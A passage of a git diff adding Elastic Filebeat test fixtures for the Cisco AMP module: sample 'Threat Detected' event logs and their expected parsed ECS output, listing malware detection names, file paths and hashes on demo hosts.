Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json new file mode 100644 index 00000000000..1722799bd5e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json @@ -0,0 +1,2828 @@ +[ + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251512150196256", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 1317, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196254", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 365000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 2642, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196253", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 350000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 3967, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 5292, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 6617, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 7942, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196249", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 303000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 9267, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196248", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 287000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 10592, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196247", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 256000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11917, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196246", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 13242, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196245", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 225000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 14567, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", 